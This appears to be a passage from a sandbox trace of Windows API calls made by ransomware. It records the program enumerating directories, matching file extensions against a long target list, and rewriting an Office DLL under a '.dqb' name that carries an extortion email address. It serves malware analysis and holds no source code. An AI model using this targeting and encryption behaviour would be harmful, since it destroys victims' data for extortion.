lstrlenW (lpString=".xls") returned 4 [0061.771] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString=".xlsx") returned 5 [0061.771] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0061.771] lstrlenW (lpString=".ppt") returned 4 [0061.771] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString=".zip") returned 4 [0061.771] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString=".rar") returned 4 [0061.771] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString=".bz2") returned 4 [0061.771] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.771] lstrlenW (lpString=".7z") returned 3 [0061.771] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString=".dbf") returned 4 [0061.771] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString=".1cd") returned 4 [0061.771] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString=".jpg") returned 4 [0061.771] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.771] lstrlenW (lpString=".doc") returned 4 [0061.771] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString=".docx") returned 5 [0061.772] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0061.772] lstrlenW (lpString=".pdf") returned 4 [0061.772] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.772] lstrlenW (lpString=".xls") returned 4 [0061.772] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.772] lstrlenW (lpString=".xlsx") returned 5 [0061.772] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0061.772] lstrlenW (lpString=".ppt") returned 4 [0061.772] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.772] lstrlenW (lpString=".zip") returned 4 [0061.772] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.772] lstrlenW (lpString=".rar") returned 4 [0061.772] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.772] lstrlenW (lpString=".bz2") returned 4 [0061.772] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.772] lstrlenW (lpString=".7z") returned 3 [0061.772] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.772] lstrlenW (lpString=".dbf") returned 4 [0061.772] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.772] lstrlenW (lpString=".1cd") returned 4 [0061.772] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.772] lstrlenW (lpString=".jpg") returned 4 [0061.772] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.772] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0061.772] lstrlenW (lpString="EXP_XPS.DLL") returned 11 [0061.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0061.776] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=71032) returned 1 [0061.776] CloseHandle (hObject=0x180) returned 1 [0061.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll")) returned 0x20 [0061.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0061.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0061.776] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0061.776] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0061.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0061.777] GetLastError () returned 0x0 [0061.777] ReadFile (in: hFile=0x180, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x11578, lpOverlapped=0x0) returned 1 [0061.818] WriteFile (in: hFile=0x15c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x11580, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x11580, lpOverlapped=0x0) returned 1 [0061.820] ReadFile (in: hFile=0x180, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0061.820] WriteFile (in: hFile=0x15c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0061.820] SetEndOfFile (hFile=0x15c) Thread: id = 18 os_tid = 0xaf0 [0032.645] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39006c0 [0032.645] lstrlenW (lpString="C:") returned 2 [0032.645] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x33ffd00 | out: lpFindFileData=0x33ffd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5c1018 [0032.646] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.646] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0032.646] lstrlenW (lpString="$Recycle.Bin") returned 12 [0032.646] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0032.646] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39106c8 [0032.646] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.646] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x660d98 [0032.646] FindNextFileW (in: hFindFile=0x660d98, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.646] FindNextFileW (in: hFindFile=0x660d98, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0032.646] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.646] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0032.646] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0032.647] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0032.647] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.647] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.647] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x661de0 [0032.647] FindNextFileW (in: hFindFile=0x661de0, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.647] FindNextFileW (in: hFindFile=0x661de0, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0032.647] lstrlenW (lpString="desktop.ini") returned 11 [0032.647] lstrlenW (lpString=".1cd") returned 4 [0032.647] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.647] lstrlenW (lpString=".3ds") returned 4 [0032.647] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0032.647] lstrlenW (lpString=".3fr") returned 4 [0032.647] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0032.647] lstrlenW (lpString=".3g2") returned 4 [0032.647] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0032.647] lstrlenW (lpString=".3gp") returned 4 [0032.647] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".7z") returned 3 [0032.648] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.648] lstrlenW (lpString=".accda") returned 6 [0032.648] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".accdb") returned 6 [0032.648] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".accdc") returned 6 [0032.648] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".accde") returned 6 [0032.648] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".accdt") returned 6 [0032.648] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".accdw") returned 6 [0032.648] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0032.648] lstrlenW (lpString=".adb") returned 4 [0032.648] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".adp") returned 4 [0032.648] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai") returned 3 [0032.648] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0032.648] lstrlenW (lpString=".ai3") returned 4 [0032.648] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai4") returned 4 [0032.648] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai5") returned 4 [0032.648] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai6") returned 4 [0032.648] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai7") returned 4 [0032.648] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".ai8") returned 4 [0032.648] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0032.648] lstrlenW (lpString=".anim") returned 5 [0032.648] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0032.648] lstrlenW (lpString=".arw") returned 4 [0032.649] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".as") returned 3 [0032.649] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0032.649] lstrlenW (lpString=".asa") returned 4 [0032.649] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".asc") returned 4 [0032.649] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".ascx") returned 5 [0032.649] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0032.649] lstrlenW (lpString=".asm") returned 4 [0032.649] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".asmx") returned 5 [0032.649] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0032.649] lstrlenW (lpString=".asp") returned 4 [0032.649] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".aspx") returned 5 [0032.649] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0032.649] lstrlenW (lpString=".asr") returned 4 [0032.649] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".asx") returned 4 [0032.649] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".avi") returned 4 [0032.649] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".avs") returned 4 [0032.649] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".backup") returned 7 [0032.649] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0032.649] lstrlenW (lpString=".bak") returned 4 [0032.649] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".bay") returned 4 [0032.649] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".bd") returned 3 [0032.649] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0032.649] lstrlenW (lpString=".bin") returned 4 [0032.649] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0032.649] lstrlenW (lpString=".bmp") returned 4 [0032.650] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".bz2") returned 4 [0032.650] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".c") returned 2 [0032.650] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0032.650] lstrlenW (lpString=".cdr") returned 4 [0032.650] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cer") returned 4 [0032.650] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cf") returned 3 [0032.650] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0032.650] lstrlenW (lpString=".cfc") returned 4 [0032.650] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cfm") returned 4 [0032.650] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cfml") returned 5 [0032.650] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0032.650] lstrlenW (lpString=".cfu") returned 4 [0032.650] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".chm") returned 4 [0032.650] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cin") returned 4 [0032.650] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".class") returned 6 [0032.650] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0032.650] lstrlenW (lpString=".clx") returned 4 [0032.650] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".config") returned 7 [0032.650] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0032.650] lstrlenW (lpString=".cpp") returned 4 [0032.650] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".cr2") returned 4 [0032.650] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".crt") returned 4 [0032.650] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0032.650] lstrlenW (lpString=".crw") returned 4 [0032.651] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".cs") returned 3 [0032.651] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0032.651] lstrlenW (lpString=".css") returned 4 [0032.651] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".csv") returned 4 [0032.651] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".cub") returned 4 [0032.651] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dae") returned 4 [0032.651] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dat") returned 4 [0032.651] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".db") returned 3 [0032.651] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0032.651] lstrlenW (lpString=".dbf") returned 4 [0032.651] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dbx") returned 4 [0032.651] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dc3") returned 4 [0032.651] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dcm") returned 4 [0032.651] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dcr") returned 4 [0032.651] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".der") returned 4 [0032.651] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dib") returned 4 [0032.651] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dic") returned 4 [0032.651] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".dif") returned 4 [0032.651] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0032.651] lstrlenW (lpString=".divx") returned 5 [0032.651] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0032.651] lstrlenW (lpString=".djvu") returned 5 [0032.651] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".dng") returned 4 [0032.652] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".doc") returned 4 [0032.652] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".docm") returned 5 [0032.652] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".docx") returned 5 [0032.652] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".dot") returned 4 [0032.652] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dotm") returned 5 [0032.652] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".dotx") returned 5 [0032.652] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".dpx") returned 4 [0032.652] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dqy") returned 4 [0032.652] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dsn") returned 4 [0032.652] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dt") returned 3 [0032.652] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0032.652] lstrlenW (lpString=".dtd") returned 4 [0032.652] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dwg") returned 4 [0032.652] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dwt") returned 4 [0032.652] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".dx") returned 3 [0032.652] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0032.652] lstrlenW (lpString=".dxf") returned 4 [0032.652] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0032.652] lstrlenW (lpString=".edml") returned 5 [0032.652] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0032.652] lstrlenW (lpString=".efd") returned 4 [0032.652] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".elf") returned 4 [0032.653] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".emf") returned 4 [0032.653] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".emz") returned 4 [0032.653] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".epf") returned 4 [0032.653] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".eps") returned 4 [0032.653] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".epsf") returned 5 [0032.653] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0032.653] lstrlenW (lpString=".epsp") returned 5 [0032.653] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0032.653] lstrlenW (lpString=".erf") returned 4 [0032.653] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".exr") returned 4 [0032.653] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".f4v") returned 4 [0032.653] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".fido") returned 5 [0032.653] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0032.653] lstrlenW (lpString=".flm") returned 4 [0032.653] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".flv") returned 4 [0032.653] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".frm") returned 4 [0032.653] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".fxg") returned 4 [0032.653] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".geo") returned 4 [0032.653] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".gif") returned 4 [0032.653] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0032.653] lstrlenW (lpString=".grs") returned 4 [0032.654] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".gz") returned 3 [0032.654] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0032.654] lstrlenW (lpString=".h") returned 2 [0032.654] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0032.654] lstrlenW (lpString=".hdr") returned 4 [0032.654] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".hpp") returned 4 [0032.654] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".hta") returned 4 [0032.654] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".htc") returned 4 [0032.654] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".htm") returned 4 [0032.654] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".html") returned 5 [0032.654] lstrcmpiW 